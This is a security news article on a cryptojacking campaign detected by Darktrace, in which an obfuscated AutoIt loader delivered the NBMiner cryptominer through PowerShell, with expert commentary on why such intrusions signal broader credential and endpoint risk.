A cryptojacking campaign was identified in which an attacker hijacked trusted Windows utilities to covertly mine cryptocurrency, marking the first known use of an obfuscated AutoIt loader to deliver an NBMiner cryptominer.

In a Sept. 3 blog post , Darktrace said it first detected and then contained the threat when a threat actor attempted to use a PowerShell script to download and run NBMiner directly in memory on one of its retail and ecommerce customers.

NBMiner cryptocurrency mining software runs on Windows and Linux and uses Nvidia and AMD GPUs to perform mining calculations and validate transactions on blockchain networks. AutoIt loaders use the legitimate scripting language AutoIt to download, decrypt, and execute a secondary, more potent malware payload.

The Darktrace researchers said the compromise was detected on July 22, when the research team saw the bad actor use a new PowerShell agent during a connection to an external endpoint — indicating an attempt at remote code execution.

Security experts said that while cryptojacking often gets portrayed as more of an inconvenience than a major enterprise threat, it’s a symptom of a broader endpoint security challenge.

“If your endpoint can be cryptojacked, then credentials, secrets and sessions on that endpoint could also be ‘jacked’ — leading to broader identity risks as attackers use these to pivot into the cloud or other systems,” said James Maude, Field CTO at BeyondTrust.

Maude added that this attack chain is typical of modern threats combining scripts with legitimate native tools such as PowerShell as well as signed third-party binaries from trusted vendors. This hybrid living-off-the-land approach uses legitimate applications alongside some anti-sandboxing evasion techniques allows threat actors to effectively evade detection.”

Jason Soroko, senior fellow at Sectigo, added organizations should treat modern cryptojacking as an intrusion signal, not a harmless nuisance. Soroko said adversaries can land through script based payloads that execute directly in memory and then hide inside trusted Windows processes, while quietly elevating privileges through known user account control (UAC) weaknesses.

“These techniques blend with normal system behavior and exploit default configurations, which means traditional signature tools often remain quiet,” said Soroko. “Mining payloads also create real costs in energy and reliability, and they may serve as cover for a broader campaign that scouts the environment and harvests credentials. Activity that looks like a minor compliance issue can therefore be the first visible symptom of unauthorized control.”